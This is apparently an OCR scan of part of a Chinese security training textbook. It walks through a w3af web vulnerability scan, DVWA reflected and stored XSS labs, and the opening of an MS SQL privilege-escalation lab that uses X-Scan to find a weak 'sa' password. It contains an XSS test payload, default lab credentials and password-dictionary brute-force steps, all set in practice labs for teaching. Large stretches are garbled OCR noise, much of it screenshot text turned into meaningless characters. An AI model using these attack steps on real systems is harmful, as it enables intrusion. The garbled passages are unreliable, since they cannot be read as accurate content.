w3af/plugins/aytput/config:htmlFilez>> 
lw3af/plugins/B teut/confi 
w3afplugtns/dUtpüt сой fd 
w3afyplugins/diütpirt/conf Tgshtmtki Led» 
Ww3af/plugins/output/config:htmlFiled»» 
Ww3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
Ww3af/plugins/output/config:htmlFile»»» 
Iw3af/plugins/output/config:htmlFile»»» 
w3af/plugins/output/config:htmlFile»»» 
Iw3af/plugins/output/config:htmlFile»»» 











图 5-38 设置 输出 的 扫描 报告 文件 testreport. html 


步骤 8: 使 用 “back” 命 令 返 回 plugins ,在 使 用 “output config console” 命 令 的 同时 使 用 





help 查看 可 使 用 的 命令 ,如 图 5 


39 所 示 。 


^ v X root@bt /pentest/web/w3af 
File Edit View Terminal Help 


lw3af/plugins/output/config:htmlFile>>> back 
w3af/plugins>>> help 


Go to the previous menu. 
Exit w3af. 
assertion. 


configure enable grep plügins 
discovery i configure enable discovery plugins 


audit configure enable audit plugins 

evasion configure enable evasion plugins 

mangle „і View, configure 

arth g Tou G E auti P dq 

bPhtefühce Conf igtire [190 ttytefored Phygins 
EU enable output plugins 


w3af/plugins»»» output config сава 
w3af/plugins/output/config: ge 


| List the available ss апа their values. 
| Set a parameter уаш 








5-39 返回 plugins 目录 后 运行 “output config console" 5 < 


步骤 9: 使 用 “view” 命 令 显 示 可 使 用 的 UR T 





verbose False” 和 “back” 命 令 ,返回 插件 设置 界面 ,如 图 5 所 示 。 











续 输 入 “set 
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^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 


Ww3af/plugins/output/config:console»»» view 


| Description 


| Enable if verbose output is. neéded 
1-- EE m ax 
w3af/plugins/output/config:console>>> set verbose False 
Ww3af/plugins/output/config:console»»» back 
W3af/plugins>>> 
w3af/plugins>>> 
w3af/plugins>>> 


w3af/plugins>>> 
lw3af/plugins>>> 
w3af/plugins>>> 
w3af/plugins>>> 
Iw3af/plugins>>> 
w3af/plugins>>> 
lw3af/plugins>>> 
Iw3af/plugins>>> 








图 5-40 输入 “set verbose False” 命 令 


步骤 10: 输入 *audit” 命 令 , 显 示 如 图 5-41 所 示 的 漏洞 类 型 。 





x root@bt: /pentest/web/w3af 
File Edit View Terminal Help 
| Ж ИГИ ШЕ ЕТ ИЧ 


PLugin name Conf | Descriptiom 
Ріпа BE e a [T e CT TE T A 

blindSqli Yes Identify blind.SQt ^ injection 
vulnerabilities. 

buffOverflow Find buffer overflow vulherabilitieSg 

dav Verify ifythe WebDAV mddule is 
properly configured. 

eval Find insecure eval() usaqë@wAndkes, 
Riancho ( andres.riancho@gmail.com"” 

fileUpload ч Uploads a file and then searchesyfop 

» 13» thé, tile inside, dl L knowf directories. 

fgfnagstring ( < [3 TE t UNU EN 

Шш Н Tràesltdluñloàd.dl Ае using frantpage 
extensions (author.dll): 

generic Find all kind of bugs withóUt а 
fixed database of errors. 

globalRedirect Find scripts that redirect the browser 
to any site. 

htaccessMethods Find misconfigurations in the 
“<LIMIT>" configuration of Apache. 

localFileInclude Find local file inclusion 





图 5-41 显示 漏洞 类 型 





步骤 11: fü À "audit htacc 
htaccessmethods ,oscommanding,sqli 和 xss 进行 审计 操作 ,然后 使 用 “back” 命 令 返 回 主 目 
录 , 如 图 5-42 所 示 。 


methods. oscommanding. sqli，xss” 命 令 , 分 别 对 
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^ v X root@bt: /pentest/web/w3af 
File Edit View Terminal Help 
lw3af/plugins>>> 

lw3af/plugins>>> 

|w3af/pLugins>>> 

lw3af/plugins>>> 

Iw3af/plugins>>> 

Iw3af/plugins>>> 

lw3af/plugins>>> 

lw3af/plugins>>> 

Iw3af/plugins>>> 

lw3af/plugins>>> 

Iw3af/plugins»»» 

|w3af/pLugins>>> 

w3af/plugins>>> 

Iw3af/plugins> 准 

w3affpludins»»* aldit Масе ќо s, Ста sdi 
EE MU DE NT ck 

lw3af>>> 

lw3af>>> 








图 5-42 对 htaccessmethods、oscommanding、sqli 和 xss 进行 审计 
步骤 12: 使 用 “target” 命 令 进入 target 目录 ,如 图 5-43 所 示 。 


v x root@bt: /pentest/web/w3af 
File Edit View Terminal Help 
w3af>>> 


List the available options and their values; 
Set a parameter value. 


Go to the previous menu 
Exit w3af. 
Check assertion. 


arget>>> view 


target0S | unknown | Тагдеё operating system (unknowñ/uñtX/windows) | 
targetFramework | unknown | Target programming framework l 

| (unknown/php/asp/asp.net/java/jsp/cfm/ruby/perl) | 
target | A comma i list of URLS 








5-43 ”使 用 “target” 命 令 进 入 target 目录 


步骤 13: 设置 目标 地 址 target 为 http://192. 168. 1. 108 ,为 下 一 步 扫描 进行 准备 ,如 
图 5-44 所 示 。 
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^ ~ * Iroot@bt: /pentest/web/w3af 
File Edit View Terminal Help 
target>>> 
arget>>> 
:target>>> set target http://192.168.1.108 
:target>>> 
:target>>> 
arget>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
target>>> 
arget>>> 
Фаг 
сае С 29 | 
паге», 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
w3af/config:target>>> | 





图 5-44 设置 目标 地 址 target 


步骤 14: 使 用 “back” 命 令 返 回 主 目录 w3af >>>, 然 后 使 用 “start” 命 令 开 始 扫 描 , 如 
图 5-45 所 示 。 


^ v X root@bt: /pentest/web/w3af 

File Edit View Terminal Help 
:target»»» 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
:target>>> 
target>>> 
target>>> 
:target>>> back 


aito enabling Prugingrepahitpauthietedt 
Found ldRLs Chi diffeffent] jp5intsjlof IE i 

URS TET IS 

- http://192.168.1.108 

The list of fuzzable requests is: 

- http://192.168.1.108 | Method: GET 

Scan finished in 3 seconds. 

w3af>>> 

w3af>>> 








图 5-45 ”使 用 “start” 命 令 开 始 扫 描 


步骤 15: 使 用 “exit” 命 令 退 出 ,然后 使 用 “ls” 命 令 查 看 是 否 有 前 面 创建 的 testreport. 
html 文件 ,如 图 5-46 所 示 ( 存 在 该 文件 ) 。 
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Гл ~ x root@bt /pentest/web/w3af 
File Edit View Terminal Help 


lw3af>>> 
Iw3af>>> 


@bt: /pentest/web/w3af# 15 
locales profiles scripts tools w3dË gui 
plugins readme ^ testreport.html w3af_console 
/pentest/web/w3af# 


/pentest/web/w3af# 
/pentest/web/w3af# 
/pentest/weh/u3af s. 
"un id m id 
7pentest/Weh/w3afs. 
/pentest/web/w3af# 
/pentest/web/w3af# 
/pentest/web/w3af# 
/pentest/web/w3af# 
/pentest/web/w3af# 
/pentest/web/w3af# 
/pentest/web/w3af# 
/pentest/web/w3af# | 








В 5-46 退出 扫描 并 查看 创建 的 文件 是 否 存在 
步骤 16: 利用 浏览 器 (本 实验 为 Firefox) 打 开 testreport. html 文件 ,显示 如 图 5-47 所 
示 的 信息 。 在 该 页 面 中 详细 记录 了 前 面 实验 中 扫描 得 到 的 信息 ,包括 audit 扫描 出 的 漏洞 、 
配置 attack 进行 的 攻击 利用 等 。 










Fri Feb 1, 1:19 АМ 


х w3af - Web Attack and Audit Framework - Vulnerability Report - Mozilla Firefox 













E} w3af - Web Attack and Audit Fr... 





ха Ө | & fileJ/pentesuweb/w3af/testreport.html 
B BackTrack Linux. offensive Security KRExploit-DB Aircrack-ng Ш ѕотағм 





URL 
http://192.168.1.108. 





Type Port Issue 








Mess: 
Time Message 
type 
Fri 01 Feb 
201301:16:27 debug (Exiting setOutputPlugins() 
AM EST 
Fri 01 Feb 


201301:16:27 debug — Called w3afCore.start() 









Enabled plugins: 
b; ) w3af - Web Attack and. 


图 5-47 显示 testreport. html 文件 的 内 容 


5.5.4 任务 与 思考 


在 具体 应 用 中 ,主要 使 用 漏洞 扫描 器 进行 漏洞 的 扫描 和 发 展 。 下 面 介绍 漏洞 扫描 器 的 
组 成 和 主要 功能 。 
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1. 安全 漏洞 数据 库 

安全 漏洞 数据 库 一 般 与 CVE(Common Vulnerabilities and Exposures ,通用 漏洞 披露 
目录 ) 保 持 兼 容 ,主要 包含 安全 漏洞 的 具体 信息 、 漏 洞 扫描 评估 的 脚本 、 安 全 漏洞 危害 评分 
(一 般 采 用 CVSS 通用 漏洞 分 组 评价 体系 标准 ) 等 信息 ,新 的 安全 漏洞 被 公开 后 ,数据 库 需 要 
及 时 更 新 。 其 中 ,CVSS(Common Vulnerability Scoring System, 通 用 漏洞 评分 系统 ) 是 一 
个 开放 的 并 且 能 够 被 产品 厂商 免费 采用 的 标准 。 

2. 扫描 引擎 模块 

作为 漏洞 扫描 器 的 核心 部 件 ,扫描 引擎 模块 可 以 根据 用 户 在 配置 控制 台 上 设 定 的 扫描 
目标 和 扫描 方法 ,对 用 来 扫描 网 络 的 请 求 数据 包 进 行 配 置 与 发 送 ,并 将 从 目标 主机 接收 到 的 
应 答 包 与 漏洞 数据 库 中 的 漏洞 特征 码 进行 比 对 ,以 判断 目标 主机 上 是 否 存在 这 些 安全 漏洞 。 
为 了 提高 效率 ,扫描 引擎 模块 一 般 提 供 了 主机 扫描 、 端 口 扫描 、 操 作 系统 扫描 \ 网 络 服务 探测 
等 功能 , 供 具体 扫描 时 选用 。 

3. 用 户 配 置 控制 台 

用 户 配置 控制 台 是 供用 户 进行 扫描 设置 的 操作 窗口 ,需要 扫描 的 目标 系统 ,检测 的 具体 
漏洞 等 信息 都 可 以 通过 配置 控制 台 来 设置 。 

4. 扫描 进程 控制 模块 

在 针对 漏洞 的 具体 扫描 过 程 中 ,攻击 者 不 仅 需 要 知道 扫描 结果 ,许多 时 候 还 要 实时 了 解 
扫描 过 程 中 显示 的 内 容 , 以 便 通过 一 些 细节 来 获取 有 价值 的 信息 。 扫 描 进程 控制 模块 提供 
了 这 些 功 能 。 














5.6 XSS 跨 站 脚本 攻击 


5.6.1 预备 知识 : 关于 DVWA 


DVWA(Damn Vulnerable Web Application) 是 基于 PHP + MySQL 的 一 套用 于 常规 
Web 漏洞 教学 和 检测 Web 脆弱 性 的 程序 ,可 以 为 安全 专业 人 员 测 试 自己 的 专业 技能 和 工 
具 提 供 所 需要 的 环境 ,帮助 Web 开发 者 更 好 地 掌握 Web 应 用 安全 防范 的 过 程 。 

DVWA 提供 了 以 下 10 个 功能 模块 。 

(1) Brute Force( 暴 力 破解 ) 。 

(2) Command Injection( 命 令 行 注 入 ) 。 

(3) CSRF( 跨 站 请 求 伪造 ) 。 

(4) File Inclusion( 文 件 包 含 ) 。 

(5) File Upload( 文 件 上 传 ) 。 

(6) Insecure CAPTCHA( 不 安全 的 验证 码 ) 。 

(7) SQL Injection( SQL ЖЛ). 

(8) SQL InjectionCBlind) (SQL В). 

(9) XSSCReflected)( 反 射 型 跨 站 脚本 ) 。 
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(10) XSS(Stored) (存储 型 跨 站 脚本 ) 。 
需要 注意 的 是 ,DVWA 的 代码 分 为 4 种 安全 级 别 : Low, Medium, High 和 Impossible, 
初学 者 可 以 通过 比较 4 种 级 别 的 代码 ,接触 一 些 PHP 代码 审计 的 内 容 。 


5.6.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,读者 可 掌握 以 下 内 容 。 
(1) 了 解 XSS 漏洞 的 攻击 原理 及 相关 知识 。 
(2) 能 够 进行 简单 的 攻击 分 析 。 
2. 实验 条 件 
+ DVWA 环境 是 基于 php/ MySQL 的 ,因此 需要 先 安装 DVWA 环境 。 为 了 便于 操 
作 , 建 议 直接 使 用 KAMPP 集成 软件 来 搭建 。 本 例 在 Windows 环境 下 安装 ,并 使 用 与 
XAMPP 集成 的 DVWA ,具体 操作 步骤 如 下 。 
步骤 1: 安装 XAMPP, M http://www. xampps. com/ 官 网 下 载 和 安装 ,只 需 注 意 选 
择 Windows 环境 ,其 他 的 按照 系统 提示 进行 即 可 。 
步骤 2; 下载 DVWA 压缩 包 。 从 http://www. дума. co. uk/ 官 网 下 载 DVWA 压缩 
包 ,并 将 压缩 包 解 压 到 dvwa, 再 将 其 复制 到 XAMPP 安装 目录 下 的 \xampp\htdocs 目录 。 
步骤 3: 通过 XAMPP 的 控制 台 启 动 XAMPP 的 Apache 和 MySQL 服务 ,如 图 5-48 
所 示 。 




















@ XAWPP Lite 2016 Е] 






















































































ХАМРР Lite 控制 面板 2016 EL 
Modules 

Service Мойше — PID(s) Ро) Actions Leme) 
[X] ^m — so [ Sup ] [Admn ] [conig ] Logs ] CERTUS 
- — 程序 目录 

(x) мма 4 3306 (Сор ][ Admin )[ Сола )[ Loss ] 
Eget 
XJ FileZilla Start in Config Logs ——— 
mantra 

[Х) тота Start Config )[ Logs ] 
轩 退出 程序 











[nain] 可 访问 言 方 网 站 www. xanpps. coa 获取 帮助 .… 
[main] Running with Administrator rights - good! 
[nain] ХАИРР Lite 安装 目录 :“c: \xanpp\” 

[nain] 初始 化 模块 ... 

8 [nain] 控制 面板 已 经 准备 好 

[apache] Attempting to start Apache арр... 
[Apache] Status change detected: running 

[mysql] Attempting to start MySQL app... 

[mysql] Status change detected: running 














18:53:44 








5-48 通过 XAMPP 的 控制 台 启 动 XAMPP 的 Apache 和 MySQL 服务 

步骤 4: 修改 \xampp\htdocs\dvwa\config 下 的 config. php 配置 文件 ,在 该 配置 文件 中 
包含 了 连接 MySQL 数据 库 的 密码 (XAMPP 集成 环境 下 面 MySQL 的 默认 登录 账号 和 密 
码 为 root/root)。 
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步骤 5: 在 浏览 器 中 输入 “http://127.0.0.1/DVWA/setup. php”, 就 可 以 访问 DVWA 
的 配置 页 面 ,如 图 5-49 所 示 。 单 击 该 页 面 中 的 Create/Reset Database 按钮 ,就 可 以 直接 将 
DVWA 的 数据 库 建立 起 来 。 








Database Setup ^ 


Click on the "Create / Reset Database' button below to create or reset your database. 
If you get an error make sure you have the correct user credentials in 
E-xampplhtdocsldvwa/config/config.inc.php 





If the database already exists, it will be cleared and the data will be reset 
You can also use this to reset the administrator credentials (admin // password") at any stage. 


Setup Check 


Operating system: Windows 
Backend database: MySQL 
PHP version: 5.4.34 


Web Server SERVER NAME 


PHP function display errors: Enabled (Easy Mode!) 
PHP function safe mode: Disabled 

PHP function allow. url include: Disabled 

PHP function allow_url_fopen: Enabled 

PHP function magic_quotes_gpc: Disabled 

PHP module php-gd Installed 


reCAPTCHA key: Missing 


Writable folder E-*xamppthtdocsldvwa/hackable/uploads/: Yes) 
Writable file E-Xxamppihtdocs!dvwa/external/phpids/0.6/lib'IDS/tmp/phpids log txt: Yes 


Status in red, indicate there will be an issue when trying to complete some modules 








| Create / Reset Database. 














图 5-49 访问 DVWA 配置 页 面 并 通过 Create/Reset Database 建立 数据 库 


另外 ,在 XAMPP 环境 下 ,也 可 以 通过 如 图 5-50 所 示 的 操作 界面 来 创建 DVWA 数据 
№. ЯЖ Setup Check 全 部 显示 为 绿色 ,而 没有 出 现 红 色 时 ,才能 表示 完全 安装 成 功 。 





Create / Reset Database 


Database has been created. 
"'users' table was created 
Data inserted into 'users' table. 


'guestbook' table was created. 





Data inserted into 'guestbook' table. 


5-50 {Е XAMPP 环境 下 创建 DVWA 数据 库 





创建 好 DVWA 数据 库 后 ,系统 自动 跳 转 到 DVWA 的 登录 页 面 ,如 图 5-51 所 示 , 系统 
默认 的 登录 账号 名 称 和 密码 为 admin/password。 
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© 127.0.0.1/DVWA/login.php 





DVR) 


Username 


Password 











Ш 5-51 DVWA 登录 页 面 


5.6.3 实验 过 程 


步骤 1: 进入 实验 场景 ,打开 XAMPP CI AGE BE" JF 1 "  " Bo EU" KAMPP > 
XAMPP Control Panel 选项 ) 控 制 台 ,在 图 5-48 所 示 的 界面 中 ,开启 Apache HTTP 服务 和 
MySQL 服务 。 

步 又 2: 打开 DVWA 网 站 。 在 浏览 器 中 输入 “http://127. 0. 0. 1/dvwa" ,正确 输入 账 
号 名 称 和 密码 (系统 默认 为 admin/password) 后 登录 ,如 图 5-52 所 示 。 





Ф 127.0.0.1/0VWA/index php тї 


Welcome to Damn Vulnerable Web Application! 


Damn Vuinerabie Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main 
goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web. 
developers better understand the processes of securing web applications and to aid both students & teachers to 
deam about web application security in a controld clase room onvironment. 


The aim of DVWA is to practice some of the most common web vulnerability. nith various difficullly 
levels, with a simple straightforward interface. 


General Instructions 


It is up to the user how they approach DVWA. Either by working through every modulo at a fixed level, or 
selecting any module and working up to reach the highest level they can before moving onto the next one. There 
is not a fixed object to complete a module however users should feel that they have successfully exploited the 
system as best as they possible could by using that particular vulnerabilty. 


Please note there are both documented and undocumented vulnerability with this software. This is 
intentional. You are encouraged to try and discover as many issues as possible 


DVWA also includes a Web Application Firewall (WAF), PHPIDS. which can be enabled at any stage to further. 
increase the dificuly. This wil demonstrate how adding another layer of security may block certain malicious 

actions Note, there are also various public methods at bypassing these protections (so this can be see an as 
extension for more advance users 


There is a heip button at the bottom of each page. which allows you to view hints & tips for that vuinerabiity 
Thoro arc also additional links for furthor background roading which rolatos to that сосыту couo 








Г ЇЇ 


WARNING! 





图 5-52 DVWA 成 功 登 录 后 的 主页 面 


步骤 3: 选择 XSS(Reflected) 后 ,打开 存在 漏洞 的 网 站 (本 实验 为 http:// 127. 0.0.1/ 
dvwa/vulnerabilities/xss_r/) ,将 该 URL 复制 到 浏览 器 的 地 址 栏 ,进入 如 图 5-53 所 示 的 
界面 。 

步骤 4: 选择 DVWA Security 的 安全 级 别 , 此 处 选择 low( 低 ) 选 项 ,如 图 5-54 所 示 o 


192 网 络 攻击 与 防御 实 训 














Vulnerability: Reflected Cross Site Scripting (XSS) 
Whats your name? 
More info 
ecu Levet iow Mere Source | Ven нею 
PMPIDS: asados 








В 5-53 存在 反射 型 XSS 漏洞 页 面 


| 





ноте | DVWA Security * 
Instructions. ] 
Setup. | Script Security 
Secuty Levi curery low 
Brute Force. 
Yeu con set the security levi to low, medium oe Nh 
COSSEN s socurty inei changes the wiaambiay inal of OVWA 
securty inai ci winarsa levi of OVW 
CSRF | d 
File teztuuon ма jus, 
SQL Injection. j 
PHPIDS 
ign ! моб PHP reremion Detection System) is а security мун for PHP based web applications 
сосал enable PHPIDS across tha site for the duration of your session. 
XSS stored 
PHPIDS is сштеу disabled. b } 
EXCEL A I 1-1 
РНР Info 
About ] 
Username: amen. 
еситу Level: к= 
PHPIOS. Grated 








图 5-54 选择 DVWA Security 的 安全 级 别 
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步骤 5: 查看 正常 输入 输出 。 在 输入 框 中 输入 “test”, 单 击 Submit 按钮 ,可 以 看 到 页 列 
上 的 正常 返回 结果 ,如 图 5-55 所 示 , 说 明 这 个 页 面 的 功能 是 将 用 户 输入 的 信息 直接 发 送 给 


ү Vulnerability: Reflected Cross Site Scripting (XSS) 












































Setup Whafs your name? 
(ам) 


Ж» tant 








Fée Inclusion. More info 





u: 3 
Secunty Leve iow Mew Serce | View Heip] 








5-55 ”页面 正常 输入 效果 


步骤 6: 查看 PHP 源码 。 单 击 右 下 角 的 View Source 按钮 ,可 以 看 到 页 面 的 PHP 源 
码 , 如 图 5-56 所 示 。 从 源码 中 可 以 看 出 ,页 面 直接 将 用 户 输 入 的 信息 返回 给 用 户 。 


<?php 





if('array_key_exists ("name 


|! $_GET 
['name'] == NULL | "yr 





Sisempty = true; 





图 5-56 mm PHP 源码 
步骤 7: 进行 攻击 测试 。 在 输入 框 中 输入 “< script >alert(/XSS/)</script >”, 可 以 看 
到 非 正 常 返回 结果 页 面 ,如 图 5-57 所 示 。 同 时 在 IP 地 址 中 可 以 看 到 输入 内 容 的 URL £i 
码 , 如 图 5-58 所 示 。 由 此 说 明 ,Web 应 用 将 未 经 验证 的 数据 通过 请 求 发 送 给 客户 端 。 




















194 网 络 攻 击 与 防御 实 训 





m, 


Vulnerability: Reflected Cross Site Scripting (XSS) 

















В 5-57 页 面 攻击 效果 


E] (9://12700-1/4e« 








В 5-58 被 攻击 页 面 此 时 的 IP 地 址 


步 又 8: 验证 此 类 漏洞 的 非 持久 性 。 重 新 访问 DVWA 页 面 , 单 击 刷新 按钮 或 再 次 选择 
左 侧 XSS reflected 选项 ,可 以 看 到 页 面 恢复 正常 ,由 此 说 明之 前 输入 的 信息 未 保存 ,是 非 持 
久 性 跨 站 脚本 漏洞 。 

步骤 9: 存储 型 KSS 攻击 。 打 开 存 在 漏洞 的 网 站 http://localhost/ dvwa/vulnerabilities/ 
xss_s/.f#E DV WA 页 面 中 选择 左 侧 的 KSS Stored( 存 储 型 XSS) 选 项 ,出现 如 图 5-59 所 示 的 
界面 。 

步骤 10: 查看 正常 输入 输出 。 在 Name 输入 框 中 输入 "test” ,在 Message 输入 框 中 输 
A “This is a test comment”。 单 击 Sign Guestbook 按钮 ,可 以 得 到 正常 的 返回 结果 如 图 5-60 
所 示 ,说 明 该 网 页 是 为 用 户 发 表 署 名 和 评论 的 。 

步骤 11: 查看 PHP 源码 。 单 击 右 下 角 的 View Source 按钮 ,可 以 看 到 页 面 的 PHP 源 
码 , 如 图 5-61 所 示 。 从 源码 中 可 以 看 出 ,页 面 允 许 用 户 存储 未 正确 过 滤 的 信息 。 

步骤 12: 进行 攻击 测试 。 在 Name 输入 框 中 输入 “Test”, 在 Message 输入 框 中 输入 
“< script > alert(/XSS/)</ script >”, 单 击 Sign Guestbook 按钮 ,再 次 访问 页 面 就 可 以 看 到 
如 图 5-62 所 示 的 对 话 框 。 
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Vulnerability: Stored Cross Site Scripting (XSS) 





Name * 


Message * 


ign Guestbook 








Name test 
Message This is a est comment 


More info 








Username: admin 
Sacurey Levet No Мом ботка | Мен нео] 
PHPIDS: $eatiec 










图 5-59 存在 存储 型 XSS 漏洞 的 页 面 


Vulnerability: Stored Cross Site Scripting (XSS) 





Name * 


Message * 











Mame test 
Message This is a test comment 








More info 
Usemame: ssm ' 
Security Levet Pigh ew Source | Метнер) 
PIEDS: Ga ated 








图 5-60 正常 输入 效果 
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e3php 


if(issert($ POST['benSign'])) 
LU 


$message = trim($ POSI['mrxMessage']); 
пале = srim($ POST['t«tName']); 


Smessage = stripslashes(Smessage): 
$message ~ mysql real escape stringí($message); 


$name ~ mysql real escape string(Sname):; 
$query ~ "INSERT INTO guestbook (comment, name) VALUES ('$message','&$name'):"; 


$result = mysql query(Squery) or die('epre»* . mysql errori) . 'c/pre»* ): 








В 5-61 页 面 PHP 源码 


ой) 


Vulnerability: Stored Cross Site Scripting (XSS) 

















5-62 ”被 攻击 的 页 面 


步骤 13: 验证 漏洞 的 存储 性 。 重 新 访问 DVWA 页 面 , 单 击 刷 新 按钮 或 再 次 选取 左 侧 
的 XSS stored 选项 ,可 以 看 到 页 面 仍然 为 图 5-62 所 示 之 前 的 对 话 框 ,说 明之 前 输入 的 信息 
被 保存 了 下 来 。 


5.6.4 任务 与 思考 
可 通过 以 下 方法 来 防范 XSS 攻击 
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1. XSS 过 滤 

虽然 XSS 攻击 的 对 象 是 客户 端 ,但 KSS 的 本 质 是 Web 应 用 服务 的 漏洞 ,所 以 必须 同时 
对 Web 服务 器 和 客户 端 进行 安全 加 固 才能 避免 攻击 的 发 生 。XSS 过 滤 需 要 在 客户 端 和 服 
务 器 端 同 时 进行 。 

2. 输入 验证 

输入 验证 就 是 对 用 户 提 交 的 信息 进行 有 效 性 验证 , 仅 接 受 有 效 的 信息 ,阻止 或 忽略 无 效 
的 用 户 输入 信息 。 在 对 用 户 提交 的 信息 进行 有 效 性 验证 时 ,不 仅 要 验证 数据 的 类 型 ,还 要 验 
证 其 格式 .长度 .范围 和 内 容 。 

3. 输出 编码 
于 大 多 数 Web 应 用 程序 都 会 把 用 户 输入 的 信息 完整 地 输出 到 页 面 中 ,从 而 导致 XSS 
漏洞 的 存在 。 为 解决 这 一 问题 , 当 需 要 将 一 个 字符 串 输出 到 Web 网 页 ,但 又 无 法 确定 这 个 
字符 串 是 否 包含 XSS 特殊 字符 时 ,为 了 确保 输出 内 容 的 完整 性 和 正确 性 ,可 以 使 用 HTML 
编码 (HTML Encode) 进 行 处 理 。 




















5.7 针对 MS SQL 的 提 权 操作 


5.7.1 预备 知识 : MS SQL 提 权 


在 很 多 时 候 , 当 攻击 者 入 侵 一 个 系统 时 ,需要 得 到 的 是 这 个 系统 的 管理 员 权 限 。 但 是 ， 
一 般 情 况 下 获取 到 的 是 普通 用 户 账户 信息 ,拥有 的 权限 相对 较 小 。 这 时 就 必须 采取 提 权 方 
式 , 将 普通 用 户 的 权限 提升 到 管理 员 的 权限 。 提 权 是 指 操作 者 提高 自己 在 系统 中 的 操作 权 
限 ,主要 用 于 网 站 入 侵 过 程 , 当 攻击 者 入 侵 某 一 网 站 时 ,通过 各 种 漏洞 提升 Web Shell 权限 
以 夺 得 该 服务 器 的 控制 权 。 

MS SQL 是 指 微软 的 SQL Server 数据 库 服 务 器 , 它 是 一 个 数据 库 平台 ,提供 数据 库 的 
从 服务 器 到 终端 的 完整 的 解决 方案 ,其 中 的 数据 库 服务 器 部 分 是 一 个 数据 库 管理 系统 ,用 于 
建立 ,使 用 和 维护 数据 库 。 

MS SQL 提 权 是 专门 针对 MS SQL 数据 库 用 户 账户 管理 权限 的 一 种 攻击 方式 ,通过 提 
升 普通 用 户 账户 的 权限 ,获取 对 MS SQL 数据 库 系统 的 管制 权限 。 


5.7.2 实验 目的 和 条 件 





1. 实验 目的 

在 熟悉 系统 提 权 攻击 基本 方法 的 基础 上 ,以 MS SQL 数据 库 系统 为 操作 对 象 ,掌握 针 
对 MS SQL 提 权 的 实现 方法 。 

2. 实验 条 件 

本 实验 中 使 用 的 清单 和 软 硬 件 如 表 5-3 所 示 。 
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表 5-3 М5 SQL 提 权 实验 清单 


























类 型 | 序 号 软 硬 件 要 求 | я ж 
1 数量 16 
攻击 机 2 操作 系统 版 本 Windows XP 以 上 
3 软件 版 本 | X Scan 扫描 器 ,SQL Tools 工具 ,SQL 查询 分 析 器 
1 数量 16 
靶 机 2 操作 系统 版 本 Windows Server 2003 
3 软件 版 本 无 


5.7.3 实验 过 程 


步骤 1: 进入 实验 环境 ,分 别 运行 攻击 机 Windows XP AEHL Windows Server 2003, 
步骤 2: 查看 靶 机 的 IP 地 址 和 MS SQL 服务 是 否 已 经 正常 启动 ,如 图 5-63 和 图 5-64 
所 示 。 


[Microsoft Windows [RA 5.2.3798] 
ko ILAA 1985-2803 Microsoft Corp. 


:NDocuments and Settings idninistrator>ipconf ig 


indovs IP Configuration 


Ethernet adapter Ж 接 : 


Connection-specific DNS Suffix 

1P даа: - - : 192.168.1.SS 
Subnet өчө . . t 255.255.255.0 
Default Gateway . - + + EEE ARE 


:NDocuments and Settings Adninistrator) m 





图 5-63 ”使 用 “ipconfig” 命 令 查看 靶 机 的 IP 地 址 
加 ziglxi 


XM MEO EV HMO 


= э mi 2 @@?ш,›апнь 
服务 EH 








Proteeted Storage 
enste Access Auto Consec 
emote Access Connection 
heste Desktop Kelp Sessi 
tenete Procedure cul QPC) 


Routing wa 


asecrmdury Lem 


Security Accounts Manager 
server 


sai Herdrere Detection 


= 9 st 14 Z: m t to 0 5 i ү Үү" 

















图 5-64 ”查看 SQL Server 是 否 已 经 正常 启动 


А 


Жо 


音 
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步骤 3: 在 攻击 机 上 ,六 





FIRER : Wndows MT/2000/XP/2003 
MWELE F indos 页 系列 只 作 系统 ， 推 荐 运行 于 Yindovs 2000 以 上 的 Server 凑 Windows 系 统 。 


11111111111111 





7 X-Scan 扫描 器 ,并 进行 





设置 ,如 图 5-65 所 示 。 


аан 


Wes: rsm 
чта аа focus. Ma prejectu гн. Mal". 





РА 5-65 设置 X-Scan 扫描 器 


步 又 4. 扫描 的 目标 IP 地 址 设置 为 靶 机 的 IP 地 址 (参照 图 5-63 中 显示 的 IP 地 址 ) ,如 
图 5-66 所 示 。 根 据 需 要 ,在 确定 攻击 对 象 的 IP 地 址 范围 但 是 无 法 确定 具体 IP 地 址 的 前 提 
下 ,可 以 在 “指定 IP 范围 ”文本 框 中 输入 需要 扫描 的 TP 地 址 或 地 址 段 。 


fr nte 








ИШЕ 
| deinem: 
[1681.59 示例 
| wl 
Г 从 文件 获取 主机 列表 
zi 
El 
wm | 











图 5-66 输入 扫描 的 IP 地 址 或 地 址 段 


步骤 5: 选取 了 扫描 参数 中 的 “扫描 模块 ”选项 后 


弱 口 令 ” 复 选 框 ,如 图 5-67 所 示 。 


,在 中 间 的 列表 框 内 选中 ”SQL-Server 
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图 5-67 设置 扫描 模块 
步骤 6: 在 选择 了 “其 他 设置 ”选项 后 ,在 打开 的 如 图 5-68 所 示 的 对 话 框 中 可 以 根据 需 
要 选择 相应 的 功能 项 。 例 如 ,选中 “显示 详细 进度 " 复 选 框 后 可 以 实时 查看 扫描 过 程 的 进展 
情况 。 














ех ss Са] » | 





5-68 ”设置 “其 他 设置 "功能 项 


步骤 7: 选择 “插件 设置 ”字典 文件 设置 ?选项 ,在 打开 的 如 图 5-69 所 示 的 对 话 框 中 
设置 扫描 过 程 中 需要 使 用 的 字典 (也 可 以 使 用 默认 字典 ) 。 

步骤 8: 单 击 “ 确 定 ” 按 钮 开始 进行 扫描 ,扫描 结果 如 图 5-70 所 示 , 得 到 了 MS SQL 数据 
库 使 用 的 弱 口 令 (sa/123456) 。 

步骤 9: 使 用 第 三 方 工 具 SQL Tools 工具 连接 到 MS SQL 数据 库 ( 也 可 以 使 用 MS 
SQL 自身 提供 的 SQL-Server 工具 进行 连接 ) ,如 图 5-71 所 示 。 


第 5 章 Web 服 务 器 攻防 实 训 


201 











HE 
Милне pass. dic 
Matlevz user. die 


Matiredk pass. dic 
Маер зөт. dic 
Mat vesk pass. dic 
Metlasil user. dic 
Met renk poss. dic 
Matlanty user. dic 
Matlreak pass. dic 
Маама user. dic 
Matlresk pass. dic 

: MatMelnet user. die 
Манеа pass. dic 
